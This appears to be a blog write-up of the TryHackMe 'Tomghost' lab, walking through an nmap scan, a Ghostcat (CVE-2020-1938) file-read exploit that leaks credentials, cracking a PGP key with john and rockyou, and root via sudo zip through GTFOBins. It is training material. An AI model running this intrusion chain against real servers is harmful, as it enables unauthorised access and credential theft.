Swafox Blog
Comment on page

TryHackMe - Tomghost

Step 1 - Reconnaissance
First step is to enumerate the machine. A simple nmap scan will do it:
nmap -Pn -sV --script vulners <IP>
Nmap scan report for
Host is up (0.055s latency).
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp open tcpwrapped
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.30
| vulners:
| cpe:/a:apache:tomcat:9.0.30:
|_ CVE-2020-1938 7.5 https://vulners.com/cve/CVE-2020-1938
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Step 2 - Web Exploitation
From the following Nmap scan, we can see that the box is vulnerable to CVE-2020-1938. Simple research revealed that this version of Apache Tomcat appears to be vulnerable to File Reading/Inclusion. The following exploit can allow us to read sensitive information, such as login credentials.
Download the exploit and run it using
python 48143.py <IP>
You should see a similar output:
Getting resource at ajp13://<IP>/asdf
<?xml version="1.0" encoding="UTF-8"?>
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
See the License for the specific language governing permissions and
limitations under the License.
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
<display-name>Welcome to Tomcat</display-name>
Welcome to GhostCat
You should see the credentials at the end of the output.
Step 3 - User.txt
Use the following credentials to log into the machine via ssh. After that, you can immediately get user.txt by browsing to **/home** and visiting another user's directory.
Step 4 - Horizontal privilege escalation
Go back to the initial user's home folder and take a look at what we got there. We can see that there are exactly 2 files: **credential.pgp** and **tryhackme.asc**. As we can easily guess, those files will reveal us some credentials (most likely for the second user). A simple google search on PGP cracking led me to this article. This small guide tells us to crack the **.asc** file with john the ripper and then use it to open up the PGP.
Let's first convert the **.asc** file into a suitable format by running:
gpg2john tryhackme.asc > hash
Then, what we need to do is simply run a rockyou-powered cracking process on the **hash** file:
john hash --wordlist=/usr/share/wordlists/rockyou.txt
A password is going to be revealed in a couple of seconds and we can finally use it to open up the **.pgp** file. Run the following command and enter the password:
gpg --import tryhackme.asc
You can now easily open the PGP file after importing the key.
gpg --decrypt credential.pgp
Bingo! We got the credentials. Now let's ssh into the box and enumerate there.
Step 5 - Root
**sudo -l** reveals that we can run **/usr/bin/zip** as sudo. A given configuration is relatively famous and is covered by GTFOBins. Link: https://gtfobins.github.io/gtfobins/zip/#sudo
Let's follow the guide from GTFO and get the root shell!
Done! We now have root access and can finally read the **/root/root.txt**.
Thank you for reading!